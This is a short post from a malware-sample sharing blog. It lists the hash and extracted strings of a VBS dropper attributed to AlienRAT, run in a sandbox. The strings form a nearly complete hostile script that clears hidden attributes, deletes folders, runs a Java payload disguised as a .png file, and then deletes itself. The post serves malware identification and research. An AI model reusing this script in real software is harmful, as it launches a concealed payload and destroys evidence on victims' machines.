About contagio exchange

Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community-driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become a useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Monday, November 17, 2014

OiuFr7LcfXq1847924646026958055.vbs - AlienRAT dropped VBS

Note: Laura is the user name on the sandbox

File: OiuFr7LcfXq1847924646026958055.vbs
MD5:  9e1ede0dedadb7af34c0222ada2d58c9
Size: 1542

Ascii Strings:
on error resume next
Wscript.sleep 5000
Dim oShell
Dim sFunction
Set oShell = WScript.CreateObject ("WSCript.shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd""",0
objFSO.DeleteFile("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd"),TRUE
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f""",0
Wscript.sleep 5000
objFSO.DeleteFile("C:\Documents and Settings\Laura\.m4w6OAI02f\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\.m4w6OAI02f"),TRUE
oShell.run """C:\Program Files\Java\jre7\bin\javaw.exe"" -jar ""C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png"""
Wscript.sleep 3000
Set oShell = Nothing
Set objFSO = Nothing
sFunction = "WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & WScript.ScriptFullName & Chr(34)

